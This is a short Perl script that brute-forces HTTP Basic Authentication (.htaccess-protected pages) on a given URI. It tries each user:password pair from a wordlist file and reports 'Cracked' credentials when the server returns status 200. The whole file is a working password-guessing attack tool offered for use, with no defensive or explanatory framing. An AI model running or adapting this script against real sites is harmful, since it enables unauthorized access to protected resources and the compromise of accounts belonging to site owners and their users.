#!/usr/bin/perl
#
# $Id: hthackess.pl 2 2008-04-24 19:55:28Z pwr $

use strict;
use warnings;
use WWW::Mechanize;
use MIME::Base64;

my ($handle, $uri, $ret, $i, @wordlist, @args);
print "Usage: ./script <uri>\n" and exit 1 if ($#ARGV != 0);
$handle = WWW::Mechanize->new();
$uri = $ARGV[0];
@wordlist = &parse_wordlist('wordlist.txt');

foreach $i (@wordlist) {
	$i =~ m/^([^:]+):(.+)$/;
	print "Trying user=\"$1\" password=\"$2\" <--> ";
	@args = (Authorization => "Basic ".MIME::Base64::encode($1.':'.$2));
	$handle->get($uri, @args);
	$ret = $handle->content();
	print "HTTP-Status: ".$handle->status()."\n";
	print "\nApparently wrong URI...\n\n" and exit 1 if ($handle->status() == 404);
	if ($handle->status() == 200) {
		print "\nCracked username=\"$1\" password=\"$2\"\n\n";
		exit 0;
	}
}
print "\nI was unable to guess username and password..\n\n";

sub parse_wordlist {
	my ($fd, @wordlist);
	open($fd, $_[0]) and @wordlist = <$fd> or die ("$!");
	close $fd;
	return @wordlist;
}